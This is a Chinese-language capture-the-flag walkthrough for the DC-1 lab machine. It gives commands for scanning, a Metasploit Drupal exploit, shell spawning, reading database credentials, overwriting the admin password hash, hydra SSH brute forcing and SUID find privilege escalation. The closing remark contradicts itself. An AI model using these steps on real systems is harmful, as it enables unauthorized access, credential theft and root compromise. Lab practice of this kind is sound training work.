官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
- 关注
环境搭建
在虚拟机中加载 DC-1 靶机,将靶机网络改为NAT模式,启动靶机即可。
信息收集
使用 nmap 扫描 C 段,获取靶机 IP 地址
nmap -Pn 192.168.207.0/24
使用 nmap 扫描靶机开放端口、服务和版本信息
nmap -sS -sV -sC -O 192.168.207.227
靶机开放了 22、80 和111 端口,web 框架使用的是 Drupal 7。
漏洞利用
使用 msf 对 Drupal 进行搜索
msfconsole -q
search drupal
在 Rank 为 excellent 中选择年份最近的,设置目标靶机地址
use 2
set RHOSTS 192.168.207.227
show options
开始攻击,获取 meterpreter
输入 python 命令,获取交互式 shell
shell
python -c 'import pty;pty.spawn("/bin/bash")'
flag1
获取 flag1,根据提示查找 drupal 的配置文件
flag2
通过查看 /sites/default/settings.php 发现 flag2 和 mysql 的用户名和密码,dbuser:R0ck3t
cat /sites/default/settings.php
登录数据库
mysql -u dbuser -p
R0ck3t
查询 drupaldb.users 表中的记录和字段,可以通过 update 去替换 admin 用户的加密密码
use drupaldb
select * from users;
desc users;
Drupal 中自带一个加密脚本,得到 admin 的加密 hash
/var/www/scripts/password-hash.sh admin
再将加密后的admin密码替换
update drupaldb.users set pass="$S$Dh4KPBQOOmjtoV/.o.TbUaqBqAKcBUOOENjJRgyUPtzvEggJg7I/" where uid=1;
flag3
使用 admin:admin 登录 192.168.207.227:80,点击 dashboard 发现 flag3
查看 /etc/passwd ,还有一个 flag4 用户
使用 hydra 爆破 ssh 服务,获取 flag4 密码为 orange
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt -t 10 ssh://192.168.207.227
flag4
查看 /home/flag4/flag4.txt文件
权限提升
查看具有特殊权限suid的命令,发现有find命令
find / -perm -4000 2>/dev/null
thefinalflag
使用find命令进行提取,获取/root/thefinalflag.txt
find /usr/bin/find -exec "/bin/sh" \;
注意:使用的是 /bin/bash ,而不是 /bin/bash
- 0 文章数
- 0 关注者